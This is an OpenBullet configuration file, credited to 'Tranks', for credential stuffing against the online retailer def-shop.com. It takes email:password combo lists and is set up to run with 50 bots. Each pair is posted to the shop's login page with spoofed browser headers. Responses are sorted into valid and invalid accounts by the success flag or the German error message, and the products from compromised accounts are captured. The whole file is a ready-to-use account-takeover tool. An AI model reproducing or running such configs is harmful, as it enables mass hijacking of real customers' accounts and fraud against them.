[SETTINGS]
{
  "CreatorLK": "OB-23f244d14075df106e85c6a72d0f039d-LoliKEY",
  "Name": "def-shop_Tranks",
  "SuggestedBots": 50,
  "LastModified": "2019-04-24T18:57:15.8707977+02:00",
  "AdditionalInfo": "",
  "KeysDB": "",
  "LocalKeysDB": "",
  "isWtoEdit": false,
  "Author": "Tranks",
  "Version": "1.2.2.4",
  "IgnoreResponseErrors": false,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://www.def-shop.com/login.php" 
  CONTENT "from=login&redirect_to=https%3A%2F%2Fwww.def-shop.com%2F%3Fbrand%3Dde.search.adwords.eigenmarke%26gclid%3DEAIaIQobChMI58j91aiq4QIVCPhRCh0BLglGEAAYASAAEgLNRPD_BwE&email_address=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 
  HEADER "authority: www.def-shop.com" 
  HEADER "method: POST" 
  HEADER "path: /login.php" 
  HEADER "scheme: https" 
  HEADER "origin: https://www.def-shop.com" 
  HEADER "referer: https://www.def-shop.com/?brand=de.search.adwords.eigenmarke&gclid=EAIaIQobChMI58j91aiq4QIVCPhRCh0BLglGEAAYASAAEgLNRPD_BwE" 
  HEADER "upgrade-insecure-requests: 1" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "\"bWasLoggedInAtLastStep\":true" 
  KEYCHAIN Failure OR 
    KEY " Keine Übereinstimmung der eingebenen 'eMail-Adresse' und/oder dem 'Passwort'. " 

PARSE "<SOURCE>" LR "<span>" "</span></a></li> <li><" -> CAP "My products" "" " |By:Tranks" 

